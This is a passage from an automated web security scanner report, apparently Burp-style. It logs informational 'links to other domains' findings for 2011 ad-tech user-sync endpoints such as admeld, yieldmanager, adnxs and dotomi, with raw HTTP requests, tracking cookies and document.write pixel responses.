!!!$='ht2!#0Ei!!!!#=$GZg!#0[r!!!!#=#32s!#16I!!<NC=$G$l!#2%T!!!!$=#pxy!#2.i!!!!#=$G$!!#2g8!!!!#=%=bG!#3pS!!!!#=$G$k!#3t$!!!!#=!yui!#5(Y!!!!#=$G$k!#5(^!!!!#=%H`<!#5(a!!!!#=$G#u!#5(c!!!!#=%H`<!#8*]!!!!#=$G]3!#<,#!!!!#=%=bG!#?dj!!!!$=#qMG!#?dk!!!!$=#qMG!#D![!!!!#=%if4!#D`%!!!!*=%=]S!#DpD!!!!#=$GZg!#Dri!!!!#=#ytJ!#H23!!!!#=%=px!#Km2!!!!#='>m<!#L$j!!!!#=#M=.!#MTC!!!!*=%=]S!#MTF!!!!'=%=]S!#MTH!!!!,=%=]S!#MTI!!!!,=%=]S!#MTJ!!!!,=%=]S!#M]c!!!!$='ht2!#O29!!!!(=%@(m!#O@L!!<NC=$G$l!#O@M!!<NC=$G$l!#O_8!!!!'=$$NV!#Q+/!!!!$='ht2!#Q+^!!!!$='ht2!#Q+o!!!!$='ht2!#Q+p!!!!$='ht2!#Q_h!!!!#=%VvP!#Qu0!!!!#=#T`h!#RY.!!!!$='ht2!#SCj!!!!$='ht2!#SCk!!!!$='ht2!#SV*!!!!*=%@(m!#Sq>!!!!#='>m<!#T^F!!!!#=!yv!!#UDQ!!!!,=%=]S!#U_(!!!!#=#$.X!#V=G!!!!#=$$P0!#XA!!!!!$='ht2!#XF5!!!!#=%=bI!#Z8A!!!!$=%@(m!#Z8E!!!!)=%@(m!#ZBw!!!!$='ht2!#]%`!!!!#=#33)!#]*j!!!!#=#pxY!#]@s!!!!#=#$2P!#]W%!!!!$='ht2!#]Z!!!!!(=%@(m!#]Z#!!!!$=%@(m!#]w)!!!!*=%=]S!#]w4!!!!)=%1p(!#]wQ!!!!(=$_d[!#]wT!!!!)=%1p(!#]x!!!!!(=$_d[!#^0%!!!!*=%@(m!#^d6!!!!#=#33)!#_am!!!!)=#!Wq!#_wj!!!!)=#!Wq!#`-7!!!!)=%@(m!#`-Z!!!!$=%=]S!#`-[!!!!$=%=]S!#`U0!!!!$=%@(m!#`cS!!!!#=%id8!#a3k!!!!$='ht2!#a=6!!!!$=%@(m!#a=7!!!!$=%@(m!#a=9!!!!$=%@(m!#aG>!!!!$='ht2!#aH+!!!!#='>m<!#aP0!!!!%='7bP!#a^D!!!!#=$GZg!#b65!!!!#=#mS:!#b<Y!!!!#=%H`<!#b<_!!!!#=%H`<!#b<a!!!!#=$G#-!#b='!!!!#=$G#u!#b=*!!!!#=$G#-!#b=E!!!!#=%H`<!#b=F!!!!#=$G#u!#bTx!!!!#=%if4!#bj8!!!!#=#mS:!#c-O!!!!+=%Vw)!#c-Z!!!!#=%VYB!#c8V!!!!(=%@(m!#c8X!!!!(=%@(m!#c8c!!!!(=%@(m!#c8i!!!!(=%@(m!#c8m!!!!(=%@(m!#c8p!!!!(=%@(m!#dWf!!!!#=#mS:!#eDE!!!!#=#[2T!#eSD!!!!(=$_d[!#f8c!!!!$='ht2!#fBj!!!!)=%@(m!#fBk!!!!)=%@(m!#fBm!!!!)=%@(m!#fBn!!!!)=%@(m!#fFG!!!!#=#T_g!#fG)!!!!$=%@(m!#fG+!!!!$=%@(m!#fpW!!!!#=#M=$!#fpX!!!!#=#M=$!#fpY!!!!#=#M=$!#g/7!!!!*=%@(m!#g=r!!!!$=%@(m!#gHm!!!!$='ht2!#g[h!!!!$='ht2!#gsl!!!!#=#mS:!#h.N!!!!#=#M8b!#k[Y!!!!#=#mS:!#k]0!!!!#=#mS:!#nF.!!!!$='ht2!#n`.!!!!#=$Fss!#nci!!!!#=$_di!#oTw!!!!#=#mS:!#ofW!!!!'=#!W!!#ogg!!!!#=#!Wq!#p#H!!!!$='ht2!#p6E!!!!#=#$.[!#p6Z!!!!#=#$.r!#p]R!!!!#=$Fss!#pua!!!!$='ht2!#q2T!!!!$=#$2R!#q2U!!!!$=#$2R!#sAb!!!!$=%HZN!#sAc!!!!$=%HZN!#sAd!!!!$=%HZN!#sAf!!!!$=%HZN!#sB1!!!!$=%HZN!#sB7!!!!$=%HZN!#sBR!!!!$=%HZN!#sC4!!!!$=%HZN!#sD[!!!!$=%HZN!#slj!!!!#=#T_f!#tM)!!!!$=%=]S!#tM*!!!!$=$Ju9!#uQC!!!!*=%=]S!#uR3!!!!$=%@(m!#uR7!!!!)=%@(m!#uRN!!!!#=#mS:!#uRP!!!!#=#mS:!#uY<!!!!#=!yv$!#ust!!!!$='ht2!#usu!!!!$='ht2!#v,U!!!!#=#mS:!#v,Y!!!!#=#mS:!#v,b!!!!#=#mS:!#v?X!!!!#=#qMG!#v?a!!!!#=#qMG!#v@3!!!!#=%=bP!#wW9!!!!$='ht2!#wYG!!!!#=$GXv!#wcv!!!!#=$Wil!#wnK!!!!$='ht2!#wnM!!!!$='ht2!#x??!!!!$=!oL8!#xBt!!!!#=#mS:!#xG5!!!!#=!yuk!#xI*!!!!$='ht2!#yM#!!!!$='ht2!$!!1!!!!$='ht2!$!4(!!!!$='ht2!$!4D!!!!$='ht2!$!89!!!!$='ht2!$!8o!!!!$='ht2!$!@.!!!!#=#HfR!$!U7!!!!#=%=bO!$#9a!!!!#=%j],!$#B<!!!!#=$_dh!$#BA!!!!#=$_dh!$#E+!!!!$='ht2!$#Fi!!!!$='ht2!$#G4!!!!$='ht2!$#M.!!!!$='ht2!$#T!!!!!$='ht2!$#T3!!!!$='ht2!$#WA!!!!$='ht2!$#X4!!!!#=#%VO!$#yu!!!!*=%=]S!$$K<!!!!#=#$.g!$%,!!!!!$='ht2!$%SB!!!!$='ht2!$%c]!!!!$='ht2!$'/S!!!!#=#mS:!$'/Y!!!!#=#mS:!$'@Q!!!!$=%@(m!$(!P!!!!)=%@(m!$('#!!!!$='ht2!$(:q!!!!#=$Fss!$(Gt!!!!'=%=]S!$(Qs!!!!$='ht2!$(ax!!!!#=#HfS!$(f7!!!!#=$_d[!$)Nf!!!!#=$GZg!$)qH!!!!$='ht2!$*Q<!!!!$='ht2!$*a0!!!!$='ht2!$*hf!!!!$=%@(m!$+Dr!!!!#=#mS:!$+_V!!!!#=$Wj6!$,0:!!!!#=$$BQ!$,0h!!!!$='ht2!$,jw!!!!#=#mS:!$-,y!!!!#=#mS:!$-kC!!!!$='ht2!$-kY!!!!#=#mS:!$-kv!!!!#=#mS:!$-rx!!!!#=$GXw!$.#F!!!!$=#qP5!$.R/!!!!$='ht2!$/iQ!!!!$='ht2!$1lN!!!!$='ht2"; path=/; expires=Wed, 12-Jun-2013 11:02:10 GMT
Set-Cookie: BX=edn6q5d6t078b&b=4&s=k0&t=135; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Cache-Control: no-store
Last-Modified: Mon, 13 Jun 2011 11:02:10 GMT
Pragma: no-cache
Content-Length: 3826
Content-Type: application/x-javascript
Age: 0
Proxy-Connection: close

document.write('<img height="1" width="1" src="http://www.googleadservices.com/pagead/conversion/1033191019/?label=5n2yCJ3M-wEQ6_zU7AM&guid=ON&script=0" />');
document.write('<img height="1" width="1" src="http://www.googleadservices.com/pagead/conversion/1049525132/?label=2dBwCMDggwIQjPe59AM&guid=ON&script=0" />');
document.write('<img height="1" width="1" src="https://www.googleadservices.com/pagead/conversion/1033191019/?label=mxelCP2b-gEQ6_zU7AM&guid=ON&script=0" />');
document.write('<img height="1" width="1" src="http://www.googleadservices.com/pagead/conversion/1049525132/?label=uk38CIiX0QEQjPe59AM&guid=ON&script=0" />');
document.write('<img height="1" width="1" src="http://www.googleadservices.com/pagead/conversion/1033191019/?label=muhJCP2z9wEQ6_zU7AM&guid=ON&script=0" />');
document.write('<img height="1" width="1" src="http://www.googleadservices.com/pagead/conversion/1033191019/?label=WkdyCKXa-wEQ6_zU7AM&guid=ON&script=0" />');
document.write('<img height="1" width="1" src="http://www.googleadservices.com/pagead/conversion/1049525132/?label=nbI8CJjeggIQjPe59AM&guid=ON&script=0" />');
document.write('<img height="1" width="1" src="http://www.googleadservices.com/pagead/conversion/1033191019/?label=kyZoCMW1gQIQ6_zU7AM&guid=ON&script=0" />');
document.write('<img height="1" width="1" src="http://www.googleadservices.com/pagead/conversion/1049525132/?label=ZIPUCNDXggIQjPe59AM&guid=ON&script=0" />');
document.write('<img height="1" width="1" src="http://www.googleadservices.com/pagead/conversion/1049525132/?label=n2ACCPDEggIQjPe59AM&guid=ON&script=0" />');
document.write('<img height="1" width="1" src="http://www.googleadservices.com/pagead/conversion/1049525132/?label=yfh4CPjKgwIQjPe59AM&guid=ON&script=0" />');
document.write('<img height="1" width="1" src="http://www.googleadservices.com/pagead/conversion/1033191019/?label=6gplCPXJ6wEQ6_zU7AM&guid=ON&script=0" />');
document.write('<img height="1" width="1" src="http://www.googleadservices.com/pagead/conversion/1049525132/?label=6L6cCMC7ggIQjPe59AM&guid=ON&script=0" />');
document.write('<img height="1" width="1" src="http://www.googleadservices.com/pagead/conversion/1033191019/?label=RmcwCOXM6QEQ6_zU7AM&guid=ON&script=0" />');
document.write('<img height="1" width="1" src="http://www.googleadservices.com/pagead/conversion/1033191019/?label=XFL7COWz7gEQ6_zU7AM&guid=ON&script=0" />');
document.write('<img height="1" width="1" src="http://www.googleadservices.com/pagead/conversion/1049525132/?label=e-86CNDegwIQjPe59AM&guid=ON&script=0" />');
document.write('<img height="1" width="1" src="http://www.googleadservices.com/pagead/conversion/1049525132/?label=0pAQCKDe0wEQjPe59AM&guid=ON&script=0" />');
document.write('<img height="1" width="1" src="http://www.googleadservices.com/pagead/conversion/1033191019/?label=Dtp9CMW-4AEQ6_zU7AM&guid=ON&script=0" />');
document.write('<img height="1" width="1" src="http://www.googleadservices.com/pagead/conversion/1049525132/?label=SWqcCPC66QEQjPe59AM&guid=ON&script=0" />');
document.write('<img height="1" width="1" src="http://www.googleadservices.com/pagead/conversion/1049525132/?label=TUhzCKingwIQjPe59AM&guid=ON&script=0" />');
document.write('<img height="1" width="1" src="http://www.googleadservices.com/pagead/conversion/1033191019/?label=ooGmCK2U7wEQ6_zU7AM&guid=ON&script=0" />');
document.write('<img height="1" width="1" src="http://www.googleadservices.com/pagead/conversion/1049525132/?label=3Nn5CODGggIQjPe59AM&guid=ON&script=0" />');
document.write('<img height="1" width="1" src="http://www.googleadservices.com/pagead/conversion/1049525132/?label=ZKywCJjtggIQjPe59AM&guid=ON&script=0" />');

18.74. http://ad.yieldmanager.com/v0/admeld-match previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.yieldmanager.com
Path:	/v0/admeld-match

Issue detail

The page was loaded from a URL containing a query string:

http://ad.yieldmanager.com/v0/admeld-match?admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=420&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match

The response contains the following link to another domain:

http://tag.admeld.com/match?admeld_adprovider_id=420&external_user_id=3%3b0%3bX99MXFyix5MEyGb4qfXUpEc2iMnV.cPqBzVT7MzyKpX07YlQq2.J9FepOfs-&expiration=1309173718

Request

GET /v0/admeld-match?admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=420&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://fansided.com/category/nba/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pc1="b!!!!#!!$gD!!E))!#CIx!0Q]c!$mX/!!H<)!?5%!)e-O=!wVd.!!6nX!!?^T!%hMd~~~~~=%3Ve=%@S6M.jTN"; uid=uid=6add2924-95ac-11e0-b4d2-43a277710b2b&_hmacv=1&_salt=4204180274&_keyid=k1&_hmac=44aa44fb7ee602e1c39d69fa3dcf95912e945eeb; pv1="b!!!!'!$([W!(WdF!$Rc1!1mH9!%ei3!!!!$!?5%!)di=9!wVd.!%vS!!$iom!'t56~~~~~=!i98~~!$)FX!!#/o!!L9x!0eaS!%iUa!#a.5!?5%!'kH#8![:Z-!#5k@!'yJf~~~~~~=$Jui~~!!wjV!!#6W!#8='!/noe!#bl)!!!!$!?5%!'k>u7![:Z-!$>',!$FVq~~~~~~=%=]O=*PGYM.jTN!#Jl?!$5*F!$uj6!.#:D!%^Pa!!!!$!?5%!$8Ip,!@Dj0!'jh]~~~~~~~='htp=(g[2!!!(["; ih="b!!!!J!'4@g!!!!#=$KA3!)AU6!!!!#='htn!-5BI!!!!$=$J^*!-ru2!!!!#=$K9.!.#:A!!!!#=$L#)!.#:D!!!!#='htp!.`.U!!!!#='htS!/JVV!!!!#='i!H!/[[9!!!!#=$L5r!/noe!!!!$=%=]O!0)2c!!!!#=$Jsh!0QGc!!!!#=$IeW!0Q]c!!!!#=%3V4!0eaS!!!!$=$Jui!19x/!!!!%=$L6>!1@m6!!!!$=%3V#!1UC$!!!!#=$G!=!1e75!!!!#=%3V6!1mH9!!!!#=!i98!1pQ3!!!!#=#32s!1qGe!!!!#=%1p'!23o_!!!!'=$Ks'!2817!!!!#=$L6.!282@!!!!$=$L5n!29j+!!!!6=$LYE!29j-!!!!#=#32k!29j/!!!!7=$LgV!29j6!!!!7=$Lth!2:N8!!!!#=%3UW!2=_P!!!!#=%3Vp!2A@,!!!!#=$Ju6!2GG7!!!!#=$J4M!2N-f!!!!B=$LJ>!2N7y!!!!$=$L=v!2NNL!!!!$=$L6,!2NO)!!!!$=$Ju2!2`+,!!!!#='hw!!2gH2!!!!#='i#o"; vuday1=!!!!#?:rWHV9*LS4M6EqGf(n`NBHr8)FyuX; lifb=3i)1!_N/#u8_XTjv=)DUs169g; bh="b!!!%.!!!?J!!!!)='htq!!(1-!!!!,='htq!!*10!!!!#='hvv!!*lZ!!!!#=$Wj6!!*oY!!!!%='hvv!!,WM!!!!#=$Wj6!!-?2!!!!*='hvv!!..X!!!!'=$L=p!!/GK!!!!,='htq!!/GR!!!!,='htq!!/Ju!!!!$='htq!!/K$!!!!'='htq!!/i,!!!!+='hvv!!0+@!!!!#='hs@!!04a!!!!#='hs@!!1Mv!!!!#=#T]$!!2)!!!!!+='hvv!!2*J!!!!#=%=bB!!3ba!!!!%='7bV!!4F0!!!!'='htq!!4Rk!!!!#=!iBY!!<A!!!!!$=!iQw!!?VS!!<NC=$G$l!!J<J!!!!-='htq!!J<K!!!!-='htq!!J<O!!!!+='htq!!J<S!!!!-='htq!!Kc5!!!!#=!Y*a!!LHY!!!!$=#$2R!!OgU!!!!+='hvv!!PKh!!!!#=$G$!!!PL)!!!!#=$G$!!!PL`!!!!$=$G$!!!Phu!!!!%='hvv!!Z+p!!!!#=!c8X!!ZUR!!!!#=$_dh!!Zwa!!!!*='hvv!!Zwb!!!!%='hvv!!]lj!!!!$=!iQw!!i5*!!!!%=!iR9!!itb!!!!-='htq!!j,.!!<NC=$G$l!!jB6!!!!$=!mmT!!jB7!!!!#=!mmT!!kl+!!!!%='hvv!!kl,!!!!%='hvv!!mL?!!!!#=%=pu!!mo!!!!!%='hvv!!nAs!!!!#=$Wj6!!rms!!!!#=!c8X!!ry1!!!!'=!msj!!t^6!!!!%=!Tiu!!tjQ!!!!%='hvv!!u*$!!!!%=!iXa!!x^7!!!!#=$Wj6!#$gc!!!!$=!iQw!#$k4!!!!$=!iQw!#')-!!!!#=$G[5!#'hi!!!#(=$Lth!#(C#!!!!%=%3Vm!#+]S!!!!+='hvv!#-B#!!!!#=$G#-!#/h(!!!!(=!msk!#/m:!!!!#=!nGq!#0Ei!!!!#=$GZg!#0[r!!!!#=#32s!#16I!!<NC=$G$l!#2%T!!!!$=#pxy!#2.i!!!!#=$G$!!#2g8!!!!#=%=bG!#3pS!!!!#=$G$k!#3t$!!!!#=!yui!#4O_!!!!#='ht3!#5(Y!!!!#=$G$k!#5(^!!!!#=%H`<!#5(a!!!!#=$G#u!#5(c!!!!#=%H`<!#6f-!!!!#=!iRq!#7(x!!!!#='hvv!#7)S!!!!#='hvv!#8*]!!!!#=$G]3!#8>+!!!!#=!i9S!#8R^!!!!#=!iRa!#:<o!!!!%=!mwU!#<,#!!!!#=%=bG!#?dj!!!!$=#qMG!#?dk!!!!$=#qMG!#C@M!!!!#=!iK@!#D![!!!!#=%if4!#D`%!!!!+='htq!#DpD!!!!#=$GZg!#Dri!!!!#=#ytJ!#H23!!!!#=%=px!#Km2!!!!#='>m<!#L$j!!!!#=#M=.!#M1G!!!!#=!c8A!#MQN!!!!#=!iJ]!#MQO!!!!#=!iJ]!#MQS!!!!#=!iJ]!#MTC!!!!+='htq!#MTF!!!!'=%=]S!#MTH!!!!-='htq!#MTI!!!!-='htq!#MTJ!!!!-='htq!#Nyi!!!!#=!eq^!#O29!!!!)='hvv!#O@L!!<NC=$G$l!#O@M!!<NC=$G$l!#O_8!!!!'=$$NV!#Os.!!!!#='hvv!#Q_h!!!!#=%VvP!#QfM!!!!#=!eq^!#Qu0!!!!#=#T`h!#SV*!!!!+='hvv!#Sq>!!!!#='>m<!#T^F!!!!#=!yv!!#TnE!!!!#='htq!#UDQ!!!!-='htq!#UW*!!!!#=!dNx!#U_(!!!!#=#$.X!#V7#!!!!#='ht3!#V=G!!!!#=$$P0!#XF5!!!!#=%=bI!#Z8A!!!!%='hvv!#Z8E!!!!*='hvv!#Zgo!!!!#='hvv!#ZhT!!!!#='hvv!#]%`!!!!#=#33)!#]*j!!!!#=#pxY!#]<e!!!!#=!iHj!#]@s!!!!#=#$2P!#]Up!!!!#='htq!#]Uq!!!!#='htq!#]Uy!!!!#='htq!#]Z!!!!!)='hvv!#]Z#!!!!%='hvv!#]w)!!!!+='htq!#]w4!!!!)=%1p(!#]wQ!!!!(=$_d[!#]wT!!!!)=%1p(!#]x!!!!!(=$_d[!#^0%!!!!+='hvv!#^d6!!!!#=#33)!#_am!!!!)=#!Wq!#_wj!!!!)=#!Wq!#`-7!!!!*='hvv!#`-Z!!!!%='htq!#`-[!!!!%='htq!#`cS!!!!#=%id8!#a=6!!!!%='hvv!#a=7!!!!%='hvv!#a=9!!!!%='hvv!#aH+!!!!#='>m<!#aP0!!!!%='7bP!#a]3!!!!$=!iR@!#a^D!!!!#=$GZg!#b65!!!!#=#mS:!#b<Y!!!!#=%H`<!#b<_!!!!#=%H`<!#b<a!!!!#=$G#-!#b='!!!!#=$G#u!#b=*!!!!#=$G#-!#b=E!!!!#=%H`<!#b=F!!!!#=$G#u!#b?f!!!!(=!msh!#bBg!!!!#=!iRr!#bTx!!!!#=%if4!#biv!!!!#=!iK0!#c-O!!!!+=%Vw)!#c-Z!!!!#=%VYB!#c8V!!!!)='hvv!#c8X!!!!)='hvv!#c8c!!!!)='hvv!#c8i!!!!)='hvv!#c8m!!!!)='hvv!#c8p!!!!)='hvv!#dCX!!!!%=!c>6!#dWf!!!!#=#mS:!#eDE!!!!#=#[2T!#eSD!!!!(=$_d[!#fBj!!!!*='hvv!#fBk!!!!*='hvv!#fBm!!!!*='hvv!#fBn!!!!*='hvv!#fFG!!!!#=#T_g!#fG)!!!!%='hvv!#fG+!!!!%='hvv!#fpW!!!!#=#M=$!#fpX!!!!#=#M=$!#fpY!!!!#=#M=$!#g/7!!!!+='hvv!#g=r!!!!%='hvv!#gS,!!!!#='i$2!#h.N!!!!#=#M8b!#k[Y!!!!#=#mS:!#n`.!!!!#=$Fss!#nci!!!!#=$_di!#oTw!!!!#=#mS:!#ofW!!!!'=#!W!!#ogg!!!!#=#!Wq!#p6E!!!!#=#$.[!#p6Z!!!!#=#$.r!#pI<!!!!%=!iWP!#p]R!!!!#=$Fss!#q+A!!!!#='htq!#q2T!!!!$=#$2R!#q2U!!!!$=#$2R!#q4c!!!!$=!iWQ!#r-[!!!!#=!c8Z!#sAb!!!!$=%HZN!#sAc!!!!$=%HZN!#sAd!!!!$=%HZN!#sAf!!!!$=%HZN!#sB1!!!!$=%HZN!#sB7!!!!$=%HZN!#sBR!!!!$=%HZN!#sC4!!!!$=%HZN!#sD[!!!!$=%HZN!#slj!!!!#=#T_f!#t<c!!!!#='hvv!#tM)!!!!$=%=]S!#tM*!!!!$=$Ju9!#uQC!!!!+='htq!#uR1!!!!#='hvv!#uR3!!!!%='hvv!#uR7!!!!*='hvv!#uY<!!!!#=!yv$!#v,b!!!!#=#mS:!#v?X!!!!#=#qMG!#v?a!!!!#=#qMG!#v@3!!!!#=%=bP!#vC^!!!!#='htq!#wYG!!!!#=$GXv!#wcv!!!!#=$Wil!#x??!!!!$=!oL8!#xBt!!!!#=#mS:!#xG5!!!!#=!yuk!$!@.!!!!#=#HfR!$!U7!!!!#=%=bO!$#B<!!!!#=$_dh!$#BA!!!!#=$_dh!$#R7!!!!#='htq!$#X4!!!!#=#%VO!$#yu!!!!+='htq!$$K<!!!!#=#$.g!$$rQ!!!!#='hvv!$'/S!!!!#=#mS:!$'/Y!!!!#=#mS:!$'@Q!!!!%='hvv!$(!P!!!!*='hvv!$(:q!!!!#=$Fss!$(Gt!!!!'=%=]S!$(Z`!!!!#=!iJp!$(ax!!!!#=#HfS!$(f7!!!!#=$_d[!$)Nf!!!!#=$GZg!$)ZR!!!!#=!i9S!$*hf!!!!%='hvv!$+_V!!!!#=$Wj6!$,0:!!!!#=$$BQ!$,gE!!!!$=!iQt!$,jw!!!!#=#mS:!$-'0!!!!#='i$,!$-rx!!!!#=$GXw!$.#F!!!!$=#qP5!$0V+!!!!#='htq"; BX=edn6q5d6t078b&b=4&s=k0&t=135

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:21:58 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Cache-Control: private
Content-Length: 300
Content-Type: text/javascript
Age: 0
Proxy-Connection: close
Server: YTS/1.18.4

document.write('<img width="0" height="0" src="http://tag.admeld.com/match?admeld_adprovider_id=420&external_user_id=3%3b0%3bX99MXFyix5MEyGb4qfXUpEc2iMnV.cPqBzVT7MzyKpX07YlQq2.J9FepOfs-&expiration=1309173718" /><img width="0" height="0" src="http://ad.yieldmanager.com/pixel?id=1019039;1031324" />
...[SNIP]...

18.75. http://adadvisor.net/adscores/g.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://adadvisor.net
Path:	/adscores/g.js

Issue detail

The page was loaded from a URL containing a query string:

http://adadvisor.net/adscores/g.js?sid=9201023828

The response contains the following links to other domains:

http://d.audienceiq.com/r/du/id/L2NzaWQvNS9leHRwaWQvNA/extuid/0
http://d.turn.com/r/dd/id/L2NzaWQvMS9jaWQvMzMxMDg2My90LzI/cat/,/id/L2NzaWQvMS9jaWQvMzMxMTIxNy90LzI/cat/000

Request

GET /adscores/g.js?sid=9201023828 HTTP/1.1
Host: adadvisor.net
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=4325897289836481830&mktid=12&mpid=-1&fpid=-1&rnd=8520899083593882395&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ab=0001%3AKWC5MC0x1u8zvrMcq4GCWFCj5DwPkE0L

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:02:20 GMT
Connection: close
Server: AAWebServer
P3P: policyref="http://www.adadvisor.net/w3c/p3p.xml",CP="NOI NID"
Content-Length: 258
Content-Type: application/javascript

document.write('<img src="http://d.turn.com/r/dd/id/L2NzaWQvMS9jaWQvMzMxMDg2My90LzI/cat/,/id/L2NzaWQvMS9jaWQvMzMxMTIxNy90LzI/cat/000" height="1" width="1" /><img height="1" width="1" src="http://d.audienceiq.com/r/du/id/L2NzaWQvNS9leHRwaWQvNA/extuid/0" />');

18.76. http://admeld-match.dotomi.com/admeld/match previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://admeld-match.dotomi.com
Path:	/admeld/match

Issue detail

The page was loaded from a URL containing a query string:

http://admeld-match.dotomi.com/admeld/match?admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=78&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match

The response contains the following link to another domain:

http://tag.admeld.com/match?admeld_adprovider_id=78&external_user_id=WH9qYld2QnJADW1dBwV4VAZUaXsQdQJCDV9iX1pP&expiration=1309173666

Request

GET /admeld/match?admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=78&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld-match.dotomi.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/aboutcontact-us/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DotomiUser=330100732990473967$0$335422886; DotomiNet=2$DjQqblZ1RXZKA2VdBAN%2BXAJHKSpAJ24SQR0PVVBLY3Jma1xARWZBXQAFW0dLSkdZYmFde25mXndRLwVZaVwXVzMdb1F%2BfgB7AEQJWmhQU0lnfmN%2BCxxQQQMwAARVT0VLQl5jalx9amdWd0J0VlgmDg4BbwFCF3B6B3YHQgtVYVNQSGF6cixKTAgJVwpKRjlES05GU2VhW3tvYlN%2BQnhGBmc%3D

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:21:06 GMT
X-Name: rtb-o01
Cache-Control: max-age=0, no-store
Content-Type: text/javascript
Connection: close
Content-Length: 171

document.write('<img src="http://tag.admeld.com/match?admeld_adprovider_id=78&external_user_id=WH9qYld2QnJADW1dBwV4VAZUaXsQdQJCDV9iX1pP&expiration=1309173666" alt="" />');

18.77. http://admeld.adnxs.com/usersync previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://admeld.adnxs.com
Path:	/usersync

Issue detail

The page was loaded from a URL containing a query string:

http://admeld.adnxs.com/usersync?calltype=admeld&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match

The response contains the following link to another domain:

http://tag.admeld.com/match?admeld_adprovider_id=193&external_user_id=3420415245200633085&expiration=0

Request

GET /usersync?calltype=admeld&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/2011/06/13/10-observations-dallas-mavs-finals/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIImdYCEAoYBCAEKAQw0ICz7wQQ0ICz7wQYAw..; anj=Kfw)k>JS.m*cOUs+'x*9/fov!U?-XD/@T`Eo*G>j9p6Kr5j'_7CgzlO:Fvgpkp?4[v=vwq`X_dWeNwpF6L1pOp0@m=r]@w@qmB`wa.gANc?%+]4$8<B8`4]:lCT3*9!qMQcil4XYmQ8WsDzIs#O67VmMmo)bHHWI6ZNYX0a_OT4xLEJYuSASUz$!y`uCnDKOlRBQu-`F+^8q^'[id[S7lqL3SyxsCSr9%@'BHMj:vbN!%A^*8GRvRZzGKBXAg>XGd5%ZV[>#w8#[npwDqVVGb#*ghU%C%7=MVqC2pmBp[Pxux0V[OL(pbe9FyrT[y*nF0xYV^1(9^IA4Y5vQ.63A13Xwt4yzbGW.9sLBw[mW8s6J_PV-8*MjghNoq:MVp!i%g:7B+-LBCkWVYq_!7QJ2ltk?f[Ob[1Nft-Sn1ma>DD[PDURe)51Ox>N/si@JJM]yC]x.!/L]TZ*wZi@6w8U'aoF=ae0W!Uew.vN=.wG!rYe0n(oapLJIa%K^mCY1KfotBEb; sess=1; uuid2=3420415245200633085

Response

18.78. http://admeld.lucidmedia.com/clicksense/admeld/match previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://admeld.lucidmedia.com
Path:	/clicksense/admeld/match

Issue detail

The page was loaded from a URL containing a query string:

http://admeld.lucidmedia.com/clicksense/admeld/match?admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=73&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match

The response contains the following link to another domain:

http://tag.admeld.com/match?admeld_adprovider_id=73&external_user_id=3460050161923843111

Request

GET /clicksense/admeld/match?admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=73&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.lucidmedia.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/aboutcontact-us/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
